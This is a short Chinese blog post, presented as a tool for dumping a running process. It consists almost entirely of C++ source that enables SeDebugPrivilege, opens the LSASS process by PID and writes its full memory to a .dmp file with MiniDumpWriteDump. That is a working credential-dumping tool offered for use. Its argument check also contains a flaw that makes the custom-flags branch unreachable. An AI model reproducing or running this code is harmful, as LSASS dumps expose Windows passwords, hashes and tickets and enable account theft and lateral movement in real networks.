#include <windows.h>
#include <DbgHelp.h>
#include <iostream>
#include <TlHelp32.h>
using namespace std;
//改变进程权限
BOOL EnablePrivilege(LPCTSTR lpPrivilegeName, BOOL bEnable)
{
HANDLE hToken;
BOOL bResult;
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;
bResult = LookupPrivilegeValue(nullptr, lpPrivilegeName,
&tp.Privileges[0].Luid);
if (bResult == FALSE)
{
return FALSE;
}
bResult = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,
&hToken);
if (bResult == FALSE)
{
return FALSE;
}
bResult = AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), nullptr,
nullptr);
CloseHandle(hToken);
return bResult;
}
#pragma comment(lib, "Dbghelp.lib")
int wmain(int argc, wchar_t* argv[]) {
if(2 != argc){
printf("Please input 2 arg");
return 0;
}
DWORD dwFlags = MiniDumpWithFullMemory;
if(3 == argc){
dwFlags = _ttoi(argv[2]);
}
DWORD lsassPID = _ttoi(argv[1]);
printf("OpenProcess %d\n", lsassPID);
HANDLE lsassHandle = NULL;
TCHAR szName[MAX_PATH] = {0};
swprintf(szName, L"%s.dmp", argv[1]);
HANDLE outFile = CreateFile(szName, GENERIC_ALL, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
EnablePrivilege(SE_DEBUG_NAME, TRUE);
lsassHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, lsassPID);
if(!lsassHandle){
printf("OpenProcess%d\n", GetLastError());
return 0;
}
if(MiniDumpWriteDump(lsassHandle, lsassPID, outFile, (MINIDUMP_TYPE)dwFlags, NULL, NULL, NULL)){
Sleep(5000);
printf("Success\r\n");
}else{
printf("Error, %d\r\n", GetLastError());
}
return 0;
}
梦回起点
做你害怕做的事,你会发现:不过如此
创建正在运行的进程的dump
2022-05-05
关键字: 创建正在运行的进程的dump
暂无评论